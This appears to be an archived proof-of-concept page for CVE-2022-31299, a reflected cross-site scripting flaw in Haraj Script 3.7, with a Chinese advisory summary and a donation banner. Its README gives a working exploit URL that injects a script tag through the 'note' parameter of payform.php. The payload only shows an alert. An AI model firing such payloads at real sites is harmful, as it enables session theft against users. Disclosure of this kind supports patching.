Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-31299 PoC — Haraj 跨站脚本漏洞

Source
Associated Vulnerability
Title:Haraj 跨站脚本漏洞 (CVE-2022-31299)
Description:Haraj是沙特阿拉伯Haraj公司的一个买卖平台。 Haraj 3.7 版本存在安全漏洞,该漏洞源于 User Upgrade Form 中存在反射型跨站脚本问题。
Description
Haraj Script 3.7 - Reflected XSS
Readme
# CVE-2022-31299
Haraj Script 3.7 - Reflected XSS

#### Exploit Title: Haraj Script 3.7 - Reflected XSS
#### Date: 2022-06-13
#### CVE: CVE-2022-31299
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://angtech.org/
#### Software Link: https://angtech.org/product/view/3
#### Version: 3.7
#### Tested on: LAMP, Ubuntu

---

[#] Exploitation :
	`https://localhost/harajnext/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(String.fromCharCode(98,52,122,98,48,122))%3C/script%3E`
File Snapshot

[4.0K] /data/pocs/2b988f4dff8cb4ca5a57976e4c6f4e1e2c871101 └── [ 554] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.